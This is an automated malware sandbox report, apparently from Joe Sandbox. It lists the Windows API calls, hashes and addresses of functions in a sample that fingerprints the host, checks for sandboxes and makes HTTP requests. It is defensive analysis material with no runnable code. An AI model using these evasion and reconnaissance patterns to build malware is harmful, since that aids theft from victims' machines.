Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D

Function 00417F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
HeapAlloc.KERNEL32(00000000), ref: 00417FCE
RegOpenKeyExA.KERNEL32(80000002,02E38478,00000000,00020119,?), ref: 00417FEE
RegQueryValueExA.KERNEL32(?,02EB5AF0,00000000,00000000,000000FF,000000FF), ref: 0041800F
RegCloseKey.ADVAPI32(?), ref: 00418022

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2

Function 00411C60 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00417690: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
Part of subcall function 00417690: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
Part of subcall function 00417690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
Part of subcall function 00417690: HeapAlloc.KERNEL32(00000000), ref: 0041779A

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 00417820: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
Part of subcall function 00417820: HeapAlloc.KERNEL32(00000000), ref: 0041783B

Part of subcall function 00417950: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,02EB5D70,00000000,?), ref: 00417982
Part of subcall function 00417950: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,02EB5D70,00000000,?), ref: 00417989

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 00417B10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
Part of subcall function 00417B10: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
Part of subcall function 00417B10: GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
Part of subcall function 00417B10: wsprintfA.USER32 ref: 00417B83

Part of subcall function 00417BC0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
Part of subcall function 00417BC0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
Part of subcall function 00417BC0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D

Part of subcall function 00417C90: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417CC5

Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
Part of subcall function 00417D20: LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
Part of subcall function 00417D20: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
Part of subcall function 00417D20: LocalFree.KERNEL32(00000000), ref: 00417EB2

Part of subcall function 00417F10: GetSystemPowerStatus.KERNEL32(?), ref: 00417F3D

GetCurrentProcessId.KERNEL32(00000000,?,02EB5B30,00000000,?,00420E0C,00000000,?,00000000,00000000,?,02EB5810,00000000,?,00420E08,00000000), ref: 004122CE

Part of subcall function 00419600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
Part of subcall function 00419600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
Part of subcall function 00419600: CloseHandle.KERNEL32(00000000), ref: 0041963F

Part of subcall function 00417F90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
Part of subcall function 00417F90: HeapAlloc.KERNEL32(00000000), ref: 00417FCE
Part of subcall function 00417F90: RegOpenKeyExA.KERNEL32(80000002,02E38478,00000000,00020119,?), ref: 00417FEE
Part of subcall function 00417F90: RegQueryValueExA.KERNEL32(?,02EB5AF0,00000000,00000000,000000FF,000000FF), ref: 0041800F
Part of subcall function 00417F90: RegCloseKey.ADVAPI32(?), ref: 00418022

Part of subcall function 004180F0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00418159
Part of subcall function 004180F0: GetLastError.KERNEL32 ref: 00418168

Part of subcall function 00418060: GetSystemInfo.KERNEL32(00420E14), ref: 00418090
Part of subcall function 00418060: wsprintfA.USER32 ref: 004180A6

Part of subcall function 00418290: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02EB5870,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
Part of subcall function 00418290: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02EB5870,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
Part of subcall function 00418290: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418302
Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418310
Part of subcall function 00418290: wsprintfA.USER32 ref: 0041833C

Part of subcall function 00418950: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
Part of subcall function 00418950: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
Part of subcall function 00418950: wsprintfA.USER32 ref: 004189E0

Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,02EB3650,00000000,00020019,00000000,004205BE), ref: 00418534

Part of subcall function 004184B0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
Part of subcall function 004184B0: wsprintfA.USER32 ref: 004185E9
Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 0041861C
Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 00418810: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
Part of subcall function 00418810: Process32First.KERNEL32(?,00000128), ref: 0041886E
Part of subcall function 00418810: Process32Next.KERNEL32(?,00000128), ref: 00418883
Part of subcall function 00418810: CloseHandle.KERNEL32(?), ref: 004188F1

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004128AB

Strings

aA, xrefs: 004128D4, 00412902, 004128D7

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID: aA
API String ID: 2204142833-2414573348
Opcode ID: 4620e36a10f7a5a598fb0a1a1229184c3baad3b87cc3beda2ebe37e6ef882961
Instruction ID: 4f79722ab1709daed6719e9a1a5ed0a8a89ced1591e892962b9c5cf472760468
Opcode Fuzzy Hash: 4620e36a10f7a5a598fb0a1a1229184c3baad3b87cc3beda2ebe37e6ef882961
Instruction Fuzzy Hash: 9872ED72D15058AACB19FB91ECA1EEE733DAF10314F5042DFB11662056EF343B98CA69

Function 00416D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02EB2270,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
CloseHandle.KERNEL32(00000000), ref: 00416D99
Sleep.KERNEL32(00001770), ref: 00416DA4
CloseHandle.KERNEL32(?,00000000,?,02EB2270,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
ExitProcess.KERNEL32 ref: 00416DC2

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B

Function 00415440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02EB7320), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02EB6960,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478

Strings

ERROR, xrefs: 004154C3
ERROR, xrefs: 0041546A

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
Opcode Fuzzy Hash: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E

Function 00417A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2

Function 00419600 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
CloseHandle.KERNEL32(00000000), ref: 0041963F

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
Instruction ID: 8add19ce2c94a4db983c162c5ea883653429c1f160fd421327fd5bffa921fc45
Opcode Fuzzy Hash: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
Instruction Fuzzy Hash: 95F03A7490120CEFDB14DBA4DD4AFEA7778BB08300F004599FA1997280E6B06E84CB95

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D

Function 02E3A6A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E3A6CE
Module32First.KERNEL32(00000000,00000224), ref: 02E3A6EE

Memory Dump Source

Source File: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E39000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e39000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: a4a8aea3d668ee91f030740b5784e4bfb9aebb06e8e1d850524a49c1e7819bd6
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 1FF096351407116FD7213BF5DC8CB6E76E8BF8972AF105538E683912C0DB74E885CA61

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66

Function 048C0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,048C0223,?,?), ref: 048C0E19
SetErrorMode.KERNEL32(00000000,?,?,048C0223,?,?), ref: 048C0E1E

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 974fbefe494e3660b2d81de3df00582b3900c2d20be45972480681e4c8a0c2b8
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 2DD01231545128B7D7003AD4DC09BCD7B1CDF05BA2F008411FB0DD9080C770954046E5

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
